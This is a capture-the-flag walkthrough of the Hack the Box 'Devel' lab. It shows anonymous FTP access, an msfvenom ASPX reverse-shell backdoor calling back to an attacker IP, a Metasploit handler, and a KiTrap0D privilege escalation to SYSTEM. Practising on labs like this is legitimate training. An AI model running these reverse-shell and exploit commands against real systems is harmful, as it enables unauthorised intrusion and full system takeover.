Hack the Box Challenge: Devel Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Devel” which is categories as retried lab presented by Hack the Box for making online penetration practices. Challenges in this lab is  very easy to complete even for beginners. 

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Devel is 10.10.10. 5 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10. 5

From given below image, you can observe we found port 21 and 80 are open and anonymous FTP login is allowed in victim’s network, therefore lets go with FTP login.

By using Anonymous: anonymous login credential you will get successfully access of ftp server via port 21 as shown below.

From given below image you can perceive we have access of remote machine. From here I can upload or download any file therefore now my next strategy will be to upload a backdoor file in victim’s machine.

Without wasting time we had generated aspx backdoor using msfvenom with help of following command and start multi handler in metasploit framework..

msfvenom -p windows/meterpreter/reverse_tcp lhost 10.10.14.6 lport=4444 -faspx > shell.aspx

Then transfer your shell.aspx file into victims’s system using filezila.

Now time to execute our shell through web browser as shown below in image.

https://ift.tt/2q1s9uo

After executing uploaded backdoor file come back to metsploit framework and wait for meterpreter session.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload windows /meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.6

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe meterpreter session1 opened for accessing victim tty shell.

meterpreter>sysinfo

Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.

use post/multi/recon/local_exploit_suggester

msf post(multi/recon/local_exploit_suggester) > set session 1

msf post(multi/recon/local_exploit_suggester) > exploit

Wonderful!! Exploit Suggester truly proof itself by suggesting other exploit name to which target is vulnerable. So now we will go with last option as highlighted in image.

use exploit/windows/local/ms10_015_kitrap0d

 msf exploit(ms10_015_kitrap0d) >set lhost 10.10.14.6

msf exploit(ms10_015_kitrap0d) >set lport 4321

msf exploit(ms10_015_kitrap0d) >set session 2

msf exploit(ms10_015_kitrap0d) >exploit

Above exploited module will create a new session with SYSTEM privileges via the KiTrap0D exploit.

Nice!! It works and we got new meterpreter session  as system user and you can check in below image.

Meterpreter > getuid

As we have tty shell that has system privileges now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside a directory.

Meterpreter > ls

We have successfully grab user.txt file from C:\Users\babis\Desktop and similarly we found root.txt from C:\Users\Administrator \Desktop.

Wonderful!! We had completed the task and hacked this box.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box Challenge: Devel Walkthrough appeared first on Hacking Articles.



from Hacking Articles https://ift.tt/2JfH4ch